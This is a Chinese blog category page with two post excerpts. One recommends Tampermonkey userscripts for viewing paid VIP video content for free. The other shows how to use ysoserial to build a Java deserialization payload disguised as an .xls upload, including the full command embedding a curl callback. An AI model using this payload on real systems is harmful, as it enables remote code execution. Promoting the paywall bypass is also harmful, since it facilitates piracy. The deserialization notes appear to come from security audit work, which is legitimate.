分类目录归档:推荐软件

推荐软件-推荐实用软件

通过油猴脚本看各大视频网站VIP

1条回复

最近狂飙很火啊,老婆还想着冲某奇的VIP看,通过网上搜索,发现油猴已经有脚本可以查看各大网站的VIP资源了。

安装油猴脚本之前,你需要一个chrome浏览器,通过谷歌扩展商店搜索:Tampermonkey(需要自备梯子)

下载好以后,找到脚本网站:

https://greasyfork.org/zh-CN/

继续阅读

使用ysoserial生成反序列化payload文件

发表评论

某次对业务进行审计发现存在一处反序列化漏洞(该漏洞形成的原因是会对上传文件引擎进行解析)

省去敏感部分,只记录一下过程。

可以直接通过github下载ysoserial-0.0.7-SNAPSHOT-all.jar

ysoserial-0.0.7-SNAPSHOT-all.jar支持多个生成payload的选项

具体适配哪个payload,还需要查看源码(如果有的情况下,没有源码的情况下只能逐个去尝试)

例如:

对应的是:

commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2

这块可以通过配置找到:(一般在pom.xml或者libraries.gradle文件配置里)

生成payload文件命令语法

java -jar ysoserial-0.0.7-SNAPSHOT-all.jar CommonsBeanutils1 “curl http://127.0.0.1:4444” > java.xls

继续阅读